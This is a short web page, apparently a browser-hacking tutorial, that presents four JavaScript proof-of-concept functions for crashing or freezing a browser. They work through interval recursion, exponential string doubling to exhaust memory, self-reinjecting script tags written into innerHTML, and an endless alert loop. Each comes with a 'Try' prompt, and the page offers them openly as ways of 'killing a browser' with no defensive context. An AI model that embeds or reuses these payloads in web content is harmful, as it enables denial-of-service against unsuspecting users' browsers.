The posibility to make a DoS in a browser is trivial, that's why in this document we will show multiple ways of killing a browser. The PoC's are exportable, anyway they may behave diferent.
This will be done via a recursion hidden inside an Interval, this will start consuming resources until the memory get exhausted, because intervals require so a small ammount of memory, the time needed to get the "out of memory" error is proportional to you RAM..
Tryfunction withIntervals(){ setInterval(withIntervals,1); }
This will try to alocate a lot of memory, and try to even get more.. this will not crash your browser, just make it "unavailable" for a long while.
Tryfunction withBigVars(){ try{ var f="pwned"; while(1){ f+=f; } }catch(e){ try{ return f+withBigVars(); }catch(e){ return f; } } }
This will make a script that will try to load again the same function, this works as another "hidden" recursion.
Tryfunction withDocWriting(){ document.getElementById("fx").innerHTML+=("<scri"+"pt>withDocWriting();</scr"+"ipt>"); try{ withDocWriting(); }catch(e){} }
The simplest PoC of DoS.. an infinite loop.
Tryfunction withAlertLoop(){ while(!alert("")); }